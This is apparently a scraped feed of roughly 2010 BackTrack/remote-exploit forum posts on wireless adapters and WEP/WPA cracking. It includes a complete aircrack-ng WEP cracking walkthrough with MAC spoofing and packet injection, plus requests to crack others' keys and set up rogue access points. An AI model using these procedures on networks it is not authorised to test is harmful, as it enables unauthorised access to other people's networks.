I know there are adapters and accessories that can reach well over a mile with the correct setup, but I'm looking for a good fast one that will reach at least 500 feet. Hopefully under 150 dollars too.
I don't want any signal boosters either, just the adapter. Plus one that would be BT4 compatible of course.
-
-
22:35
»
remote-exploit & backtrack
Does anybody know what chipset a microsoft brand wireless notebook adapter MN-520 has? i read that it should work with backtrack but idk for sure and i need to know if i should just buy a better one?
-
-
19:30
»
remote-exploit & backtrack
So I have the PCMCIA Proxim Orinoco Gold 8470_fc; this card works out of the box in BT3: monitor, injection, no problem
In BT4 I have issues. After I finally got it recognized and put in monitor mode (takes a little trick as well) I went to launch aireplay and after a few seconds my system froze. Does this card need a patch on BT4?
-
-
17:21
»
remote-exploit & backtrack
ok so i have been getting this error in gerix
Error opening /root/.gerix-wifi-cracker/*.xor "packetforge-ng --help" for help. [Failure]
I replaced the 'o' with '0' in gerix.py where it says packetforge since 0 is the arp option; again I got the same error.
The error says /root/gerix. I looked at the code and I could not find anything related to this error except the configuration directory mentioned in the beginning of the code. Could this be the problem? Should I point it to where the gerix directory is at?
-
-
0:57
»
remote-exploit & backtrack
Hey guys, I was wondering if someone could tell me if Nessus is really required to run the tools in Backtrack. Aircrack tools specifically...thanks!
-
13:05
»
remote-exploit & backtrack
Hi All... before.. i'm sorry if this thread is not in place.. :)
This my first thread..
Hi.. I would ask.. How to mapping wireless using modem sierra 881U with GPS ?
Thanks...
Yours
Semiotics Code
-
-
5:56
»
remote-exploit & backtrack
Dear All
I have an N150 Netgear router and I am trying to break the WEP code on it.
I have logged into it to apply the following settings:
enc:wep 64bit
key:1B9DDA483D
I have tried the usual packet injection method using aireplay to break into my BT Business Hub with no issue; however, when I do the same for the Netgear the number of data packets captured does not go above 255!
I do not know why this is!
Any ideas?
cheers
-
1:28
»
remote-exploit & backtrack
hi,
I have got wpa handshake but unable to get key...i m submitting 3 *.cap files which contains IVs.Plz get me wpa key for each cap file...
I have attached files in : hxxp://uploading.com/files/cacfc23c/cap.rar/
thx
-
-
1:24
»
remote-exploit & backtrack
Hey I'm not doing any hacking right now, just trying to set up a network.
I have a computer running Linux, and it has two wifi cards:
1) wlan0 = RTL8187L (This is an Alfa 500mw)
2) wlan1 = rt73 (This is just a shitty little TP-Link USB stick)
So I've got an extension lead for the Alfa and it's mounted on top of my house. The Alfa is used to connect to a network which is about 100 metres away, and this network provides an Internet connection.
What I want to do is broadcast an AP from my other wifi card (the rt73), so that computers in my house can connect to it. I will set up routing between wlan1 and wlan0 so that computers in my house can access the internet.
Setting up wlan1 and setting up the routing will be a piece of cake:
Code:
ifconfig wlan1 10.10.10.1 netmask 255.255.255.0
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A POSTROUTING -o wlan0 -s 10.10.10.0/24 -j MASQUERADE
Also I will set up DHCP on wlan1 so that all my computers at home can get connected to the access point with ease.
Now, here's the question:
What program should I use for managing the access point which will be broadcast from wlan1?
I've heard of hostapd, airbase-ng and mdk3.
I want to have a full range of options for the AP I broadcast from wlan1, e.g. whether it's not encrypted, or WEP, or WPA.
Which program would you recommend? Which is most reliable and does its job the best for what I'm looking for?
-
0:35
»
remote-exploit & backtrack
I was wondering if anyone on here has been successful in overclocking this particular graphics card. I added the "coolbit" option and I even see the overclock options in the Nvidia X Server Settings, but when I try to change any of the values, it changes right back to default values. Really weird. If anyone has been successful, would you please share what you did and also what values you used? Thanks!
-
-
3:15
»
remote-exploit & backtrack
I finally got CUDA working ok and I did a benchmark which shows that CUDA is slower than my CPU! I don't understand. Am I doing something wrong? My graphics card is an Nvidia GeForce 8600M GS. Here are my results:
root@bt:~# pyrit benchmark
Pyrit 0.3.0 (C) 2008-2010 Lukas Lueg
This code is distributed under the GNU General Public License v3+
Running benchmark (1363.2 PMKs/s)... /
Computed 1403.20 PMKs/s total.
#1: 'CUDA-Device #1 'GeForce 8600M GS'': 630.5 PMKs/s (RTT 3.1)
#2: 'CPU-Core (SSE2)': 678.5 PMKs/s (RTT 2.8)
-
0:23
»
remote-exploit & backtrack
I ran the karma.rc script and I have two problems.
1. The karma.rc console writes:
"Exploit failed, could not obtain a database connection within 5 second. The max pool size is currently 30; consider increasing it."
and
" ActiveRecord:ConnectionTimeoutError, could not obtain a database..."
2. When the DHCP server runs, it writes:
"Can't create PID file /var/run/dhcpd.pid: Permission denied."
Could anybody help me?
-
-
22:08
»
remote-exploit & backtrack
Hey guys, anyone use Crunch anymore? Or is it something outdated? All the commands I find don't work anymore. What I'm trying to do is essentially passthrough with crunch (exactly what is on page 17 in Pureh@te's CUDA guide) The command is:
/pentest/passwords/crunch/crunch 8 8 123456 | pyrit -e "ESSID" -f - passthrough | cowpatty -d - -r wpa-01.cap -s "ESSID"
I've tried many variations of this and can't get it to work. Please help me, thanks!
-
4:17
»
remote-exploit & backtrack
Hey guys, I'm reading the CUDA guide trying to passthrough with Crunch. I've tried so many different possibilities and nothing is working. Any ideas? This is the last thing that I've tried:
/pentest/passwords/crunch/crunch 10 10 0123456789 | pyrit -e Riley -o - passthrough | /pentest/wireless/cowpatty/cowpatty -d - -r outfile.cap -s Riley
cowpatty 4.6 - WPA-PSK dictionary attack. <jwright@hasborg.com>
Collected all necessary data to mount crack against WPA2/PSK passphrase.
Starting dictionary attack. Please be patient.
Using STDIN for hashfile contents.
WARNING: Version mismatch between <module 'cpyrit._cpyrit_cpu' from '/usr/lib/python2.5/site-packages/cpyrit/_cpyrit_cpu.so'> ('0.3.0') and <module 'cpyrit._cpyrit_cuda' from '/usr/lib/python2.5/site-packages/cpyrit/_cpyrit_cuda.so'> ('0.3.1-dev (svn r228)')
The command 'passthrough' requires the option '-i'. See 'help'.
fread: Success
Unable to identify the PSK from the dictionary file. Try expanding your
passphrase list, and double-check the SSID. Sorry it didn't work out.
0 passphrases tested in 0.27 seconds: 0.00 passphrases/second
-
1:32
»
remote-exploit & backtrack
I cannot figure out how to fix this. Tried googling and no help. This may not even be something to be worried about, idk. When I run: pyrit selftest, it says everything is running ok. I just don't like warnings ;) This is the warning that I am getting:
root@bt:~# pyrit benchmark
WARNING: Version mismatch between <module 'cpyrit._cpyrit_cpu' from '/usr/lib/python2.5/site-packages/cpyrit/_cpyrit_cpu.so'> ('0.3.0') and <module 'cpyrit._cpyrit_cuda' from '/usr/lib/python2.5/site-packages/cpyrit/_cpyrit_cuda.so'> ('0.3.1-dev (svn r228)')
Pyrit 0.3.0 (C) 2008-2010 Lukas Lueg
Project Hosting on Google Code
This code is distributed under the GNU General Public License v3+
Running benchmark (1382.6 PMKs/s)... |
Computed 1373.47 PMKs/s total.
#1: 'CUDA-Device #1 'GeForce 8600M GS'': 632.1 PMKs/s (RTT 2.9)
#2: 'CPU-Core (SSE2)': 671.4 PMKs/s (RTT 3.0)
-
-
14:20
»
remote-exploit & backtrack
Hi all, BT4 Final is great! But creating a fake AP in master mode on my atheros ar5007 doesn't seem to work. I like master mode for its great AP speeds. I can't get a softAP over 5kB/s, no matter what MTU I try.
I'm using nick_the_greek's great wlan_nick script, as an aid in creating them. master mode in bt4pf was like I had a 50+kB/s normal AP, low latency and everything.
ath5k drivers don't support master mode. Now I tried the latest madwifi-ng drivers. I can make an ath0 VAP in master mode, but when I try starting airbase, it fails:
Code:
madwifi-ng drivers:
root@bt:~# wlanconfig ath0 destroy
root@bt:~# ip link set dev wifi0 down
root@bt:~# wlanconfig ath0 create wlandev wifi0 wlanmode master
root@bt:~# iwconfig | grep "Mode:"
ath0 Mode:Master
root@bt:~# airbase-ng ath0
ioctl(SIOCSIWMODE) failed: Invalid argument
root@bt:~# airbase-ng wifi0 (works fine)
Code:
ath5k drivers:
root@bt:~# ifconfig wlan0 down
root@bt:~# iwconfig wlan0 mode master
Error for wireless request "Set Mode" (8B06) :
SET failed on device wlan0 ; Invalid argument
root@bt:~# iwconfig wlan0 mode managed (works fine)
So for some reason with BT4F, I can only create a softap on wlan0, mon0 or wifi0, but can't create a master mode AP. Am I overlooking something?
With BT4 PF and beta it seemed to work fine tho...
Ideas anyone?..
-
-
10:14
»
remote-exploit & backtrack
You become when I have a key and do not enter how certain with backtrack 4?
-
-
4:00
»
darkc0de
Wireless Moon 3.0,aircrack and net stumbler
-
-
13:05
»
remote-exploit & backtrack
Anyone know or own a wireless card for a laptop that works in BackTrack, including injection?
Any suggestions will be appreciated, thank you
-
-
13:07
»
remote-exploit & backtrack
Problem with station mac because it withdraws five with six why in one bssid
-
-
5:27
»
remote-exploit & backtrack
In airodump-ng the data packet count is 1200000, and aircrack-ng shows me 508 IVs. Why?
-
-
15:48
»
remote-exploit & backtrack
hi,
I can't remember a tool I used on BackTrack or where to find it. It was a wordlist creator.
For example, I have a WPA handshake and I know my WPA is 8 letters long and in capital letters. There was a tool on BackTrack where I could point this tool to the handshake file and it would start going through all the letters, e.g.
AAAAAAAB
AAAAAAAC
AAAAAAAD
and so on, but I just can't remember where this tool is on BackTrack
Hope you can help
-
10:10
»
remote-exploit & backtrack
greets all,
so I'm in the market for an (c)antenna upgrade = I am looking to purchase a new wifi antenna. I have multiple wifi cards, all with the ability to connect an external antenna via male RP-SMA connector, only 3 of the cards are really worth a darn tho. specifically 2x USB alfa cards (AWUS036nh - 2000mW, AWUS050NH - 500mW) and a dlink (DWL-G520 revB PCI). for an external antenna I am using the "super cantenna" from wireless garden inc. with a cheap retractable tripod (from walmart for $13) and up-until-now, my antenna setup has been rock solid, and great performer for me. the specs for it are as follows :
Code:
Super Cantenna
Model SCB10X:
Electrical Specifications
Frequency: 2400-2500 MHz
Gain: 12 dbi
Beam Width: Approx. 30 degrees
Impedance: 50 Ohm
Max input: 50 Watts
VSWR: <1.5:1 avg.
Mechanical Specifications
Length: 12”
Material Base: Metal
Lid: Plastic
Connector: Integrated 36-inch RPSMA cable, RPTNC adapter
Polarization: Linear
I figure I might as well go for a "bigger and better" antenna :D I've got $100 to sink into my purchase. my use case is as follows: I have a local coffee shop that lets me siphon internet, for being a loyal customer (well, actually the g/f is, I don't drink coffee), and for helping out with tech support issues every now and then. I live about 5-6 blocks from them, and get a decent signal now, but I just know I can get better... I think I just need to upgrade the antenna I have.
so I figured I'd come to ol' faithful = the remote-exploit forums, to see if one of u can make a suggestion for what to buy, and/or give your opinion of your current setup?! I have looked long and wantonly at onryo's thread = ultra long range antennas - howto , but have come to the conclusion that it is just too much work, and requires too steady of a hand + patience to get it built (not to mention working properly) ... so I've decided that is out of the question... really any DIY project is out of question. I'd rather just buy one. boy, I do truly wish someone would manufacture that pwnbone of his, as I'd love to snatch something like that up in an instant!
I've checked into freenet antennas (which is outside of the US), gold wireless antennas, l-com - specifically this, this page talks about many different antennas, etc. what about this one I keep seeing ALL over ebay?
only recently I decided to take a look at ebay, and WOW - there are sooo many antennas it's hard to separate the crap from the good when I just don't have much knowledge in the antenna selection department. for example, this one sounds very nice = "2.4GHz 16DBi Wifi Yagi Antenna RP-SMA and Moutning kit". some are USB based? whatever I get, I want to make sure that the parts are of high quality, will last long (even in exposure to the outdoor elements of the pacific NW = lots of rain), has minimal signal degradation, and hopefully has the approval of other remote-exploit forum-goers.
honestly, I'd like to hear what other remote-exploit forum-goers have in their setup, and if possible I'd like to be able to purchase something similar, as long as it's an upgrade from what I currently have with the potential of increasing my signal to my connection which is ~5-6 blocks away. ideally I'd love to get something along the lines of onryo's pwnbone!
quoting from the text underneath his image of the pwn bone on his site::
Quote:
This is the "pwn bone" A 26dBi yagi. The PwnBone is 3 PCB Teflon stripline 20 dBi yagi antennas stacked at about 1/20th lambda and phased a little. I rescaled it for 2442 MHz from an existing classified design. No it is not curved. The wide angle lens sucks. Length is 1.6 meters. From 5.1 km line of sight I have a -52 dbi signal. Using a 2 watt amp to fry away any problems I may encounter. Have had up to 332 APs seen at once while pointed in one direction. Nice addition to my rouge AP.
|
(onryo, hope u don't mind me linking to yr pic/site - if u desire I will take this part out ... I'm just sooo envious! )
so what'cha think? someone wanna offer me a suggestion, or point out a site for me to pick up something, nice n easy? purrty-please? :D
-
-
22:02
»
remote-exploit & backtrack
I have a really good Broadcom based PCMCIA card that works great in Debian (after fwcutter, older kernel) but there is a slight issue in BT4.
The card works in BT4 right after the fresh install but it sees only a half or less of APs that the Intel based card inside the laptop can see. This is odd because normally in Debian or Windows this Broadcom card can detect many more APs than any other card I've ever seen.
I know this is vague but I am looking for any ideas on how to fix this.
-
16:57
»
remote-exploit & backtrack
How do I retrieve the client MAC from my cap file?
I'm using "airodump-ng -c 11 --bssid 00:11:22:33:44:55 -w output-home mon0" to filter by the AP I'm monitoring.
Apparently a client connected, because I see that I have collected 75 IVs, but I didn't see the client MAC (I'm assuming it refreshed out, or whatever) by the time I saw the data numbers. So, I'm hoping to get the client MAC from the cap file.
Feel free to point me to a related post, but I didn't find one via search.
Thanks!
-
10:57
»
remote-exploit & backtrack
hi all
I have a little question!
We've set up an AP with a WEP shared key and I assumed that a hacker may have my WEP!!
So we decided to limit the MAC addresses of the wireless cards!
Is there any way that someone can fake these MACs or bypass this limitation anyway?
I read that if this limitation is present, it is possible to notice this with a tcpdump command by getting a deauth result, so I want to know: can this limitation protect my AP?!
-
-
13:53
»
remote-exploit & backtrack
Is this possible, I mean to try to capture IVs and have a connection to another modem altogether..?
-
9:29
»
remote-exploit & backtrack
I am a beginner ... I am trying to crack the WEP key of a wifi network .... it's my home network and its key is a mobile no. .... I did everything and got the pcap file of the handshaking signal using aireplay-ng
It's a .cap file .... now how do I get the WEP key from it, since a dictionary attack won't work ..... so tell me a brute force method to get it
-
4:32
»
remote-exploit & backtrack
Hello.
First of all, I should say that I am just getting into this subject, so I apologize if I ask something "obvious".
I use BackTrack4.
I am trying to identify myself and connect to the router:
ifconfig -a
ifvonfig wlan0 up
ifconfig
iwlist wlan0 scanning
iwconfig wlan essid A1A channel 8
Up to there everything is fine; the issue is that it does not associate with the access point:
wlan0 IEEE 802.11bg ESSID:"A320ATV"
Mode:Managed Frequency:2.447 GHz Access Point: Not-Associated
Tx-Power=27 dBm
Retry min limit:7 RTS thr:off Fragment thr=2352 B
Encryption key:off
Power Management:off
Link Quality:0 Signal level:0 Noise level:0
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0
I have tried several commands but it stays the same, and I have not found anything on the net either, so here I am.
I need help connecting; I hope it then gives me the IP.
Regards.
Roberto.
-
1:06
»
remote-exploit & backtrack
Hey guys, I just want to say thank you for all the valuable information on here. I have learned a lot by just reading. I wanted to wait until I had a really good question to make my first post. I really hope this hasn't been answered already. If it has, I'm sorry. Must have missed it. I've been googling for hours trying to find a specific answer but I can't find it. Here goes...is it possible (using CUDA) to use John-the-ripper to generate passwords, have Pyrit compute the hash's and pipe directly to cowpatty to crack? If it is possible, what would be the command for that? I consider myself somewhat of a noob, so please don't assume I know something ;) Thank you!
-
-
11:26
»
remote-exploit & backtrack
^^Title^^
That would be so awesome.
-- Dr. Nick
-
9:13
»
remote-exploit & backtrack
It drives me mad! Yeah!!! My friend's modem had pass 1234567890 and was hacked with 20.000 IVs. My pass is different, and I have already captured 100.000 IVs and it is still not hacked. Is this possible?
-
9:11
»
remote-exploit & backtrack
I tried to recover the key in clientless mode (the data is not real, but the commands are exact)
airodump-ng -c 11 -b 00:1A:C1:15:BE:34 -w cap mon0
CH 11 ][ Elapsed: 3 mins ][ 2010-02-26 13:34
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH E
00:1A:C1:15:BE:34 -74 100 1986 0 0 11 54 . WEP WEP OPN 3
BSSID STATION PWR Rate Lost Packets Probes
So far everything is OK, no client; chopchop attack
aireplay-ng -1 0 -a 00:1A:C1:15:BE:34 -h 00:E0:4C:05:1A:32 mon0 (command to associate)
13:31:11 Waiting for beacon frame (BSSID: 00:1A:C1:15:BE:34) on channel 11
13:31:11 Sending Authentication Request (Open System) [ACK]
13:31:11 Authentication successful
13:31:11 Sending Association Request [ACK]
13:31:11 Association successful :-) (AID: 1)
So far everything is OK, at least in my opinion.
aireplay-ng -4 -b 00:1A:C1:15:BE:34 -h 00:E0:4C:05:1A:32 mon0
13:31:29 Waiting for beacon frame (BSSID: 00:1A:C1:15:BE:34) on channel 11
^Cad 1502 packets...
Here I think there is a problem: shouldn't it have opened a separate window for me and then asked me to confirm with Y? Instead it started without asking me anything and keeps running like this forever?
It should have responded like this:
Read 165 packets...
Size: 86, FromDS: 1, ToDS: 0 (WEP)
BSSID = 00:14:6C:7E:40:80
Dest. MAC = FF:FF:FF:FF:FF:FF
Source MAC = 00:40:F4:77:E5:C9
0x0000: 0842 0000 ffff ffff ffff 0014 6c7e 4080 .B..........l~@.
0x0010: 0040 f477 e5c9 603a d600 0000 5fed a222 .@.w..`:...._.."
0x0020: e2ee aa48 8312 f59d c8c0 af5f 3dd8 a543 ...H......._=..C
0x0030: d1ca 0c9b 6aeb fad6 f394 2591 5bf4 2873 ....j.....%.[.(s
0x0040: 16d4 43fb aebb 3ea1 7101 729e 65ca 6905 ..C...>.q.r.e.i.
0x0050: cfeb 4a72 be46 ..Jr.F
Use this packet ? y
-
-
19:51
»
remote-exploit & backtrack
I'm going crazy here. Correct me if I'm wrong, but doesn't this cap have all four parts I need?
Well, it seems I cannot link to my cap file, sorry! GRRRRRR
So why does aircrack say I don't have the key?
-
-
7:44
»
remote-exploit & backtrack
Good morning!
So here is probably the craziest scenario-
my ALFA AWUS050NH is in monitor mode, but when I run:
# airodump-ng ra0
it only sees ONE wifi network. The same wifi network on EVERY channel, and there's 5 around me, which is so odd..
any ideas?
Thanks in advance =)
-
-
4:25
»
remote-exploit & backtrack
Hello everyone,
I would like to test a 24-character Alice WPA key using John the Ripper in "incremental mode", by creating in the john.conf file an incremental mode with the characters I need. I have already seen on the aircrack forum that it is necessary to configure a linking file with the .char extension, for example:
[Incremental:Alpha]
File = $JOHN/alpha.chr
MinLen = 1
MaxLen = 8
CharCount = 26
Here, with this configuration, john generates characters taken from the alpha.char file with a max length of 8 and a min of 1.
My problem is that when I change the maxlen parameter to a value greater than 8, john errors out, and I cannot even open the alpha.chr file. The aircrack forum also says that the john.pot file must be modified, but it does not say how. Confident of your help, I thank you in advance.
-
1:09
»
remote-exploit & backtrack
Hi everyone! I have read many interesting articles about sniffing, but my intel3945 wifi card only sees my own PC's traffic. I have followed lots of guides on the internet about enabling monitor mode or compat-wireless, but nothing changes. Can I solve the problem or do I have to give up? I use ubuntu 9.10.
Thanks! :)
-
0:36
»
remote-exploit & backtrack
Hi everyone,
I'm a big fan of these forums and have learned a lifetime of information simply by reading and lurking. I'm an up-and-coming programmer and I wanted to give something back to the community...
Grim Wepa [v0.5] is currently in beta mode, and I'm looking for testers!
The program is available on Google Code at:
code.google.com/p/grimwepa/
Grim Wepa is heavily influenced by SpoonWEP and SpoonWPA; both in GUI and functionality. I am a fan of ShamanVirtuel's work and wanted to see if I could create something similar.
The Spoon suite (SpoonWEP/2, SpoonWPA) wasn't working properly for me on BT4, so I wrote this program in Java to automate WEP and WPA cracking.
GrimWepa does NOT include a fancy new cracking method: It is the same tried-and-true methods that we are all accustomed to (aircrack-ng, airodump-ng, aireplay-ng, and the like). GrimWepa merely automates the running of these scripts in an easy-to-use GUI format.
I've only been able to test each option briefly, and some attacks have been completely unsuccessful (Chop-chop and Cafe-latte refuse to generate packets on my router). Fragmentation, ARP replay, and -p0841 work very well, as does the WPA handshake capture + wordlist attack.
I have posted the source code (not to v0.6, but a recent revision) to allow others to aid in developing if they wish. If you want to compile the program yourself, you can access the source using the console command:
svn checkout http[colon]//grimwepa.googlecode.com/svn/trunk/
Note: use a real colon : instead of [colon] to properly checkout the code. (I'm not allowed to post full URLs yet!)
Some files that are in the .jar file are not included in the source (such as default_pw.txt and README.txt), so be aware. You will also need the app "javac" to compile the source code (javac is available in the sun-java6-jdk install package).
For those that don't want to compile themselves, just download the .jar file and type:
java -jar grimwepa_0.5.jar
at the console to get started.
Enjoy!
-Derv
-
-
7:04
»
remote-exploit & backtrack
hi all
I tried to crack a friend's WEP-encrypted AP with aircrack-ng (command line; if any GUI exists please let me know)
I use these commands:
sudo airmon-ng start wlan0 5
sudo airodump-ng --ivs -w Erix -c 5 wlan0
sudo aireplay-ng -5 -b 00:00:00:00:00:00 -h 00:00:00:00:00:00 wlan0
sudo aireplay-ng -1 0 -e Torkanet -a 00:00:00:00:00:00 -h00:00:00:00:00:00 wlan0
(MAC addresses are different but the AP is Torkanet :D & it is on channel 5)
this is when no clients are present!
and these commands when we use a client:
sudo airmon-ng start wlan0 5
sudo airodump-ng --ivs -w Erix -c 5 wlan0
sudo aireplay-ng -0 10 -a 00:00:00:00:00:00 -c 00:00:00:00:00:00 wlan0
sudo aireplay-ng -3 -b 00:00:00:00:00:00 -h 00:00:00:00:00:00 wlan0
The problem is when aircrack-ng gets packages it says ".....still nothing trying another package". It does this over and over and over till I run low on physical memory :D!! What should I do?
Is our network secured enough?
And another silly question is :D about this command:
sudo aireplay-ng -5 -b 00:00:00:00:00:00 -h 00:00:00:00:00:00 wlan0
Which MAC address is mine and which is the AP's? (the same question goes for the -3 option!!)
By the way, sorry for my weak English!! :D
-
-
18:18
»
remote-exploit & backtrack
hi
I want to join the BackTrack WiFu course
Ask not what I will do I get aim of this course
Please help from experts in this discipline
Do you advise me to register for this course
What do you think of this course
-
-
12:32
»
Hack a Day
[Tom Shannon] uses science as part of his art. One of his methods when painting is to use this radio controlled paint pendulum. He gave an interview at his studio, which we’ve embedded after the break, and goes into detail about this device. It has six different reservoirs that hold the paint colors. Each gravity-fed [...]
-
-
20:26
»
remote-exploit & backtrack
Good evening everyone,
The reason for this tutorial (for beginners only; everyone else, be patient, hehe)
I was at the office today thinking that I should contribute to the community that has helped me so much, so I decided to write this mini tutorial for people interested in wireless network security in general.
This time I am only going to cover very general aspects of the suite that ships by default with Backtrack 4 (aircrack-ng), since wireless security is a fairly broad subject and you will need to read and look up information on whatever interests you most. :D
Legal notice
This document is written solely to guide people toward the best possible security practices; likewise, it is intended for purely educational purposes, and under no circumstances should anyone enter a network or computer system without proper permission.
What are the tools I am going to talk about:
Airmon-ng: a tool that lets us put our wireless cards into monitor mode so that we can do "tasks" that would otherwise not be possible.
Aireplay-ng: a tool that lets us inject packets into an access point (AP), in this case a router, so that capturing data does not take ages.
Airodump-ng: a tool that lets us "dump" the packets sent through the AP, capture them and analyze them.
Aircrack-ng: the name says it all; it is the tool used to crack, if that term applies, the keys of those networks, depending on the situation.
Now that we have an idea of what we are going to use, let's set everything up.
What we need:
A laptop with BT4 (live CD or installed)
An AP (router)
So, let's suppose our network is called conejo, it has "WEP encryption" and we want to get in. Now what do we do???
We have to do several things, namely:
- See which card we have
- "Bring it down" so we can change the way it works.
- Change our MAC address for security
- Enable monitor mode on the card
Here is an idea of how it should be done; at least it works for me this way :)
root@infected:~# airmon-ng
Interface Chipset Driver
wlan0 Atheros ath5k - [phy0]
mon0 Atheros ath5k - [phy0]
root@infected:~# airmon-ng stop wlan0
Interface Chipset Driver
wlan0 Atheros ath5k - [phy0]
(monitor mode disabled)
mon0 Atheros ath5k - [phy0]
root@infected:~# ifconfig wlan0 down
root@infected:~# macchanger --mac 00:11:22:33:44:55 wlan0
Current MAC: 00:11:22:33:44:55 (Cimsys Inc)
ERROR: Can't change MAC: interface up or not permission: Device or resource busy
root@infected:~# ifconfig wlan0 down
root@infected:~# macchanger --mac 00:11:22:33:44:55 wlan0
Current MAC: 00:11:22:33:44:55 (Cimsys Inc)
Faked MAC: 00:11:22:33:44:55 (Cimsys Inc)
It's the same MAC!!
root@infected:~# airmon-ng start wlan0
Found 2 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!
PID Name
10859 wpa_supplicant
10888 dhclient
Process with PID 10859 (wpa_supplicant) is running on interface wlan0
Process with PID 10888 (dhclient) is running on interface wlan0
Interface Chipset Driver
wlan0 Atheros ath5k - [phy0]
(monitor mode enabled on mon1)
mon0 Atheros ath5k - [phy0]
root@infected:~#
Now we have to "monitor" the packets destined for the AP with the following
root@infected:~# airodump-ng mon0
CH 9 ][ Elapsed: 8 s ][ 2010-02-04 20:35
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:03:2F:28:FD:74 -27 4 2 0 1 54 . WEP WEP conejo
BSSID STATION PWR Rate Lost Packets Probes
(not associated) 00:24:2B:B4:6D:6D -75 0 - 1 12 9
00:03:2F:28:FD:74 00:11:22:33:44:55 0 0 - 1 0 7 conejo
And now "grab" those packets with the following:
root@infected:~# airodump-ng -c 1 -w conejo --bssid 00:03:2F:28:FD:74 mon0
CH 1 ][ Elapsed: 16 s ][ 2010-02-04 20:37
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:03:2F:28:FD:74 -26 0 16 4 0 1 54 . WEP WEP conejo
BSSID STATION PWR Rate Lost Packets Probes
00:03:2F:28:FD:74 00:11:22:33:44:55 0 54 - 1 0
Now, if we sit and wait for the "DATA" to reach about 15000 packets (the minimum required to find the WEP key), it could take us hours, which is why our dear aireplay-ng comes into play here....
So what we have to do is the following: inject packets into the AP so that the IVs (initialization vectors), which is where the key is found, are generated faster, by doing the following:
root@infected:~# aireplay-ng -1 0 -a 00:03:2F:28:FD:74 -h 00:11:22:33:44:55 -e conejo mon0
The interface MAC ( 00:11:F5:78:C0:D0 ) doesn't match the specified MAC (-h).
ifconfig mon0 hw ether 00:11:22:33:44:55
20:45:02 Waiting for beacon frame (BSSID: 00:03:2F:28:FD:74) on channel 1
20:45:02 Sending Authentication Request (Open System) [ACK]
20:45:02 Authentication successful
20:45:02 Sending Association Request [ACK]
20:45:02 Association successful :-) (AID: 1)
root@infected:~# aireplay-ng -3 -b 00:03:2F:28:FD:74 -h 00:11:22:33:44:55 mon0
The interface MAC (00:11:F5:78:C0:D0) doesn't match the specified MAC (-h).
ifconfig mon0 hw ether 00:11:22:33:44:55
20:47:00 Waiting for beacon frame (BSSID: 00:03:2F:28:FD:74) on channel 1
Here we have to wait until the data reaches a minimum of 15000 packets to be able to crack it...
CH 1 ][ Elapsed: 4 mins ][ 2010-02-04 21:01
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:03:2F:28:FD:74 -24 46 247 78575 276 1 54 . WEP WEP conejo
BSSID STATION PWR Rate Lost Packets Probes
00:03:2F:28:FD:74 00:11:22:33:44:55 0 48 - 1 114686 194709 conejo
^C
root@infected:~#
After this, now that we have enough IVs or DATA, we move on to the last step, which is cracking the password.
root@infected:~# aircrack-ng -n 128 -b00:03:2F:28:FD:74 conejo-01.cap
Aircrack-ng 1.0 r1645
[00:02:32] Tested 1376257 keys (got ********* IVs)
KB depth byte(vote)
0 0/ 1 FB(256512) FA(208640) 0A(202240) 16(201984) B5(201984)
1 0/ 1 00(400384) F8(311552) F7(272640) F6(208896) 07(202240)
2 0/ 1 FC(597760) F3(335616) F4(310528) F2(272384) 03(202240)
3 0/ 1 FB(793856) ED(335360) EE(334336) F3(256256) EF(232448)
4 0/ 1 FA(932608) E7(333568) ED(320000) E8(318976) E9(224000)
5 0/ 1 F9(1007104) E6(381952) E0(333056) E1(317696) E7(255488)
6 0/ 1 F8(1019648) DE(395776) D8(380160) DF(317184) D9(316416)
7 0/ 1 F7(1016064) D5(394496) D6(379392) CF(378112) D7(318720)
8 0/ 1 F6(1012736) CB(393472) CC(392960) CD(380672) C5(376576)
9 0/ 22 BD(260608) 82(260096) 86(260096) 88(259840) 8A(259840)
10 0/ 1 F6(997632) FA(392448) FB(391936) 5A(391168) F9(389888)
11 0/ 1 0F(994304) 15(393728) 13(391936) 25(391424) 14(390912)
12 0/ 1 24(884724) 9E(366844) 9C(365888) 9D(365300) 9B(363208)
Starting PTW attacks with 78575 ivs.
KEY FOUND! backtracking
Decrypted Correctly: 100%
root@infected:~#
And that would be all for WEP...
Corrections are welcome... Regards, and I hope this material has been useful... The next one will be about WPA..... and for the record, this is my first time... :)
-
2:26
»
remote-exploit & backtrack
Hi guys
I have been playing around with rogue APs for a little while with Airbase and mitmap..
What I was thinking is whether it would be possible to add a captive portal to the fake AP, so anyone who connects to it is redirected to a specific webpage.
I have tried messing with other captive portal/firewall programs like zeroshell and pfsense, but both of these run from a live CD and need a whole other computer to run.
I have heard you can achieve the captive portal by using iptables also..
If this is possible, can someone explain how to do this in BackTrack 4, and whether there are any other possible ways, as I'm pretty stuck..
thanks a lot...
Cee:)
-
-
10:26
»
remote-exploit & backtrack
I wonder if this wireless usb card can be set into monitor mode?
The model is: D-Link DWA 125, it uses a Ralink chipset.
-
-
15:43
»
remote-exploit & backtrack
Hello everyone, I am desperately looking for the drivers to get my Netgear WG111 V2 with the rtl8187l chipset working on BackTrack 4 final. In the previous version, BackTrack 3 beta, it was recognized perfectly without adding any drivers; now it is not. I don't think we are going backwards instead of forwards, so I am surely the one getting it wrong; in any case I think it must be supported, at least I hope so... What do you say... Basically it is recognized among the USB devices, but network management doesn't find it, and likewise running ifconfig only finds a device "lo", which by the way I don't know what it is.... Who can give me a hand? Even by telling me something that makes me stop this exhausting search...
Thanks a lot!!!
Regards, luca
-
14:07
»
remote-exploit & backtrack
How can I find and replace all the {word}/{random_chars} with {word}? I've tried using sed but I find it too complicated. Could you help me with the right tutorial or a sed command that will do something like that?
Here is an example of what my wordlist looks like:
Code:
abandonare
abandonarii
abandona/RT
abandonata
abandonat
abandonati
abandonat/W
abandoneaza
abandoneze
abandonez/W
abandonind
abandonuri/L
abanos
abata
abate
abateau
abatere/Z
abateri/GL
abatia/Z
abatoare/XC
abator
abatut/XM
abatut
abces
abdica/AP
abdicare
abdicare
abdicari/LZ
abdica/RZ
abdice/LZ
abdominale
abecedarul
abera/XC
aberanta
aberant
